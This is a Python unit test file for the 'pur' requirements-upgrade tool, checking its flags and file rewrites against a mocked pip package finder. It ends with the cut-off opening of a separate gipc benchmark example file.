expected_requirements = open('tests/samples/requirements-nested.txt').read()
self.assertEquals(open(requirements_nested).read(), expected_requirements)
def test_skip_package(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements-multiple.txt', requirements)
args = ['-r', requirements, '-s', 'flask']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Updated Alembic: 0.9 -> 0.10.1\nUpdated sqlalchemy: 0.9 -> 0.10.1\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_skip_package').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_minor_upgrades(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements, '--minor', 'flask']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '12.1.3'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Updated flask: 12.0 -> 12.1.3\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_minor').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_minor_skips(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements, '--minor', 'flask']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '13.0.0'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "All requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/requirements.txt').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_minor_skips_with_wildcard(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements, '--minor', '*']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '13.0.0'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "All requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/requirements.txt').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_patch_upgrades(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements, '--patch', 'flask']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '12.0.3'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Updated flask: 12.0 -> 12.0.3\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_patch').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_patch_skips(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements, '--patch', 'flask']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '12.1.3'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "All requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/requirements.txt').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_patch_skips_with_wildcard(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements, '--patch', '*']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '12.1.3'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "All requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/requirements.txt').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_only_stable_versions_selected(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements]
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '13.0.0.dev0'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "All requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/requirements.txt').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_pre_upgrades(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements, '--pre', 'flask']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '13.0.0.dev0'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Updated flask: 0.9 -> 13.0.0.dev0\nUpdated flask: 12.0 -> 13.0.0.dev0\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_pre_release').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_pre_upgrades_with_wildcard(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements, '--pre', '*']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '13.0.0.dev0'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Updated flask: 0.9 -> 13.0.0.dev0\nUpdated flask: 12.0 -> 13.0.0.dev0\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_pre_release').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_skip_multiple_packages(self):
requirements = 'tests/samples/requirements-multiple.txt'
tempdir = tempfile.mkdtemp()
tmpfile = os.path.join(tempdir, 'requirements.txt')
shutil.copy(requirements, tmpfile)
args = ['-r', tmpfile, '-s', 'flask, alembic , SQLAlchemy']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "All requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open(requirements).read()
self.assertEquals(open(tmpfile).read(), expected_requirements)
def test_only(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements-multiple.txt', requirements)
args = ['-r', requirements, '--only', 'flask']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Updated flask: 0.9 -> 0.10.1\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_only').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_only_multiple_packages(self):
requirements = 'tests/samples/requirements-multiple.txt'
tempdir = tempfile.mkdtemp()
tmpfile = os.path.join(tempdir, 'requirements.txt')
shutil.copy(requirements, tmpfile)
args = ['-r', tmpfile, '--only', 'flask, sqlalchemy']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Updated flask: 0.9 -> 0.10.1\nUpdated sqlalchemy: 0.9 -> 0.10.1\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_only_multiple_packages').read()
self.assertEquals(open(tmpfile).read(), expected_requirements)
def test_updates_package_with_no_version_specified(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements, '-f']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Updated flask: 0.9 -> 0.10.1\nUpdated flask: Unknown -> 0.10.1\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_updates_package_with_no_version_specified').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_invalid_package(self):
requirements = 'tests/samples/requirements.txt'
tempdir = tempfile.mkdtemp()
tmpfile = os.path.join(tempdir, 'requirements.txt')
shutil.copy(requirements, tmpfile)
args = ['-r', tmpfile]
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
mock_find_all_candidates.return_value = []
result = self.runner.invoke(pur, args)
expected_output = "All requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertIsNone(result.exception)
self.assertEquals(result.exit_code, 0)
self.assertEquals(open(tmpfile).read(), open(requirements).read())
def test_no_arguments(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = []
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
with self.cd(tempdir):
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Updated flask: 0.9 -> 0.10.1\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_updates_package').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_no_arguments_and_no_requirements_file(self):
tempdir = tempfile.mkdtemp()
args = []
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
with self.cd(tempdir):
result = self.runner.invoke(pur, args)
self.assertEqual(result.exception.code, 1)
expected_output = "Error: Could not open requirements file: [Errno 2] No such file or directory: 'requirements.txt'\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 1)
def test_updates_package_with_number_in_name(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements-version-in-name.txt', requirements)
args = ['-r', requirements]
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'package1'
version = '2.0'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Updated package1: 1 -> 2.0\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_updates_package_with_version_in_name').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_updates_package_with_extras(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements-with-extras.txt', requirements)
args = ['-r', requirements]
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'firstpackage'
version = '2.0'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
expected_output = "Updated firstpackage1: 1 -> 2.0\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertIsNone(result.exception)
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_updates_package_with_extras').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_updates_package_with_max_version_spec(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements-with-max-version-spec.txt', requirements)
args = ['-r', requirements]
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'afakepackage'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
expected_output = "Updated afakepackage: 0.9 -> 0.10.1\nUpdated afakepackage: 0.9 -> 0.10.1\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertIsNone(result.exception)
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_updates_package_with_max_version_spec').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_max_version_spec_prevents_updating_package(self):
requirements = 'tests/samples/requirements-with-max-version-spec.txt'
tempdir = tempfile.mkdtemp()
tmpfile = os.path.join(tempdir, 'requirements.txt')
shutil.copy(requirements, tmpfile)
args = ['-r', tmpfile]
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'afakepackage'
version = '2.0'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "All requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
            expected_requirements = open(requirements).read()
self.assertEquals(open(tmpfile).read(), expected_requirements)
def test_notequal_version_spec_prevents_updating_package(self):
requirements = 'tests/samples/requirements-multiline.txt'
tempdir = tempfile.mkdtemp()
tmpfile = os.path.join(tempdir, 'requirements.txt')
shutil.copy(requirements, tmpfile)
args = ['-r', tmpfile]
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'afakepackage'
version = '0.9.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "All requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
            expected_requirements = open(requirements).read()
self.assertEquals(open(tmpfile).read(), expected_requirements)
def test_updates_package_with_multiline_spec(self):
requirements = 'tests/samples/requirements-multiline.txt'
tempdir = tempfile.mkdtemp()
tmpfile = os.path.join(tempdir, 'requirements.txt')
shutil.copy(requirements, tmpfile)
args = ['-r', tmpfile]
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'afakepackage'
version = '1.0'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Updated afakepackage: 0.9 -> 1.0\nUpdated afakepackage: 0.9 -> 1.0\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_updates_package_with_multiline_spec').read()
self.assertEquals(open(tmpfile).read(), expected_requirements)
def test_does_not_update_package_with_multiline_spec(self):
requirements = 'tests/samples/requirements-multiline.txt'
tempdir = tempfile.mkdtemp()
tmpfile = os.path.join(tempdir, 'requirements.txt')
shutil.copy(requirements, tmpfile)
args = ['-r', tmpfile]
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'afakepackage'
version = '1.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "All requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open(requirements).read()
self.assertEquals(open(tmpfile).read(), expected_requirements)
def test_updates_package_with_min_version_spec(self):
requirements = 'tests/samples/requirements-with-min-version-spec.txt'
tempdir = tempfile.mkdtemp()
tmpfile = os.path.join(tempdir, 'requirements.txt')
shutil.copy(requirements, tmpfile)
args = ['-r', tmpfile]
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'fakewebserver'
version = '1.8.13'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
expected_output = "Updated fakewebserver: 1.8.6 -> 1.8.13\nNew version for fakewebserver found (1.8.13), but current spec prohibits updating: fakewebserver > 1.8.6, < 1.9\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertIsNone(result.exception)
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_updates_package_with_min_version_spec').read()
self.assertEquals(open(tmpfile).read(), expected_requirements)
def test_does_not_update_package_with_wildcard_spec(self):
requirements = 'tests/samples/requirements-with-wildcard-spec.txt'
tempdir = tempfile.mkdtemp()
tmpfile = os.path.join(tempdir, 'requirements.txt')
shutil.copy(requirements, tmpfile)
args = ['-r', tmpfile]
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'fakewebserver'
version = '0.9.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
expected_output = "Updated flask: 0.9 -> 0.9.1\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertIsNone(result.exception)
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_does_not_update_package_with_wildcard_spec').read()
self.assertEquals(open(tmpfile).read(), expected_requirements)
def test_dry_run(self):
requirements = 'tests/samples/requirements.txt'
tempdir = tempfile.mkdtemp()
tmpfile = os.path.join(tempdir, 'requirements.txt')
shutil.copy(requirements, tmpfile)
args = ['-r', tmpfile, '-d']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = '==> ' + tmpfile + ' <==\n' + \
open('tests/samples/results/test_updates_package').read() + "\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
self.assertEquals(open(tmpfile).read(), open(requirements).read())
def test_dry_run_with_nested_requirements_file(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements-with-nested-reqfile.txt')
requirements_nested = os.path.join(tempdir, 'requirements-nested.txt')
shutil.copy('tests/samples/requirements-with-nested-reqfile.txt', requirements)
shutil.copy('tests/samples/requirements-nested.txt', requirements_nested)
args = ['-r', requirements, '-d']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'readtime'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
self.assertEquals(result.exit_code, 0)
expected_output = '==> ' + requirements_nested + ' <==\n' + \
open('tests/samples/results/test_updates_package_in_nested_requirements_nested').read() + "\n" + \
'==> ' + requirements + ' <==\n' + \
open('tests/samples/results/test_updates_package_in_nested_requirements').read() + "\n"
self.assertEquals(u(result.output), u(expected_output))
expected_requirements = open('tests/samples/requirements-with-nested-reqfile.txt').read()
self.assertEquals(open(requirements).read(), expected_requirements)
expected_requirements = open('tests/samples/requirements-nested.txt').read()
self.assertEquals(open(requirements_nested).read(), expected_requirements)
def test_updates_from_alt_index_url(self):
requirements = 'tests/samples/requirements-with-alt-index-url.txt'
tempdir = tempfile.mkdtemp()
tmpfile = os.path.join(tempdir, 'requirements.txt')
shutil.copy(requirements, tmpfile)
args = ['-r', tmpfile]
class PackageFinderSpy(PackageFinder):
_spy = None
def __init__(self, *args, **kwargs):
super(PackageFinderSpy, self).__init__(*args, **kwargs)
PackageFinderSpy._spy = self
with utils.mock.patch('pur.PackageFinder', wraps=PackageFinderSpy) as mock_finder:
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '12.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
self.runner.invoke(pur, args)
self.assertTrue(mock_finder.called)
self.assertEqual(
PackageFinderSpy._spy.index_urls,
['http://pypi.example.com', 'https://pypi2.example.com']
)
self.assertEqual(
PackageFinderSpy._spy.secure_origins,
[('*', 'pypi.example.com', '*')]
)
def test_updates_from_alt_index_url_command_line_arg(self):
requirements = 'tests/samples/requirements.txt'
tempdir = tempfile.mkdtemp()
tmpfile = os.path.join(tempdir, 'requirements.txt')
shutil.copy(requirements, tmpfile)
args = ['--index-url', 'http://pypi.example.com', '--index-url', 'http://pypi2.example.com', '-r', tmpfile]
class PackageFinderSpy(PackageFinder):
_spy = None
def __init__(self, *args, **kwargs):
super(PackageFinderSpy, self).__init__(*args, **kwargs)
PackageFinderSpy._spy = self
with utils.mock.patch('pur.PackageFinder', wraps=PackageFinderSpy) as mock_finder:
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '12.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
self.runner.invoke(pur, args)
self.assertTrue(mock_finder.called)
self.assertEqual(
PackageFinderSpy._spy.index_urls,
('http://pypi.example.com', 'http://pypi2.example.com')
)
def test_updates_from_alt_index_url_with_verify_command_line_arg(self):
requirements = 'tests/samples/requirements.txt'
tempdir = tempfile.mkdtemp()
tmpfile = os.path.join(tempdir, 'requirements.txt')
shutil.copy(requirements, tmpfile)
args = ['--index-url', 'https://pypi.internal', '--verify', '/path/to/cert/file', '-r', tmpfile]
class PackageFinderSpy(PackageFinder):
_spy = None
def __init__(self, *args, **kwargs):
super(PackageFinderSpy, self).__init__(*args, **kwargs)
PackageFinderSpy._spy = self
with utils.mock.patch('pur.PackageFinder', wraps=PackageFinderSpy) as mock_finder:
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '12.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
self.runner.invoke(pur, args)
self.assertTrue(mock_finder.called)
self.assertEqual(PackageFinderSpy._spy.index_urls, ('https://pypi.internal', ))
self.assertEqual(PackageFinderSpy._spy.session.verify, '/path/to/cert/file')
def test_interactive_choice_default(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements, '-i']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Update flask from 0.9 to 0.10.1? (y, n, q) [y]: \nUpdated flask: 0.9 -> 0.10.1\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_updates_package').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_interactive_choice_yes(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements, '-i']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args, input='y\n')
self.assertIsNone(result.exception)
expected_output = "Update flask from 0.9 to 0.10.1? (y, n, q) [y]: y\nUpdated flask: 0.9 -> 0.10.1\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_updates_package').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_interactive_choice_no(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements, '-i']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args, input='n\n')
self.assertIsNone(result.exception)
expected_output = "Update flask from 0.9 to 0.10.1? (y, n, q) [y]: n\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/requirements.txt').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_interactive_choice_quit(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements-multiple.txt', requirements)
args = ['-r', requirements, '-i']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args, input='y\nq\n')
self.assertIsNone(result.exception)
expected_output = "Update flask from 0.9 to 0.10.1? (y, n, q) [y]: y\nUpdated flask: 0.9 -> 0.10.1\nUpdate Alembic from 0.9 to 0.10.1? (y, n, q) [y]: q\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_interactive_choice_quit').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_interactive_choice_invalid(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements-multiple.txt', requirements)
args = ['-r', requirements, '-i']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args, input='z\nn\ny\nq\n')
self.assertIsNone(result.exception)
expected_output = "Update flask from 0.9 to 0.10.1? (y, n, q) [y]: z\nPlease enter either y, n, q.\nUpdate flask from 0.9 to 0.10.1? (y, n, q) [y]: n\nUpdate Alembic from 0.9 to 0.10.1? (y, n, q) [y]: y\nUpdated Alembic: 0.9 -> 0.10.1\nUpdate sqlalchemy from 0.9 to 0.10.1? (y, n, q) [y]: q\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_interactive_choice_invalid').read()
self.assertEquals(open(requirements).read(), expected_requirements)
|
StarcoderdataPython
|
3297415
|
<filename>examples/gipc_benchmark.py
# -*- coding: utf-8 -*-
# Copyright 2012-2020 Dr. <NAME>. See LICENSE file for details.
"""
Example output for Python 2.7.3 on Ubuntu 10.04 on a Xeon E5630, for two cases:
# MSG length optimized for throughput (length 64000):
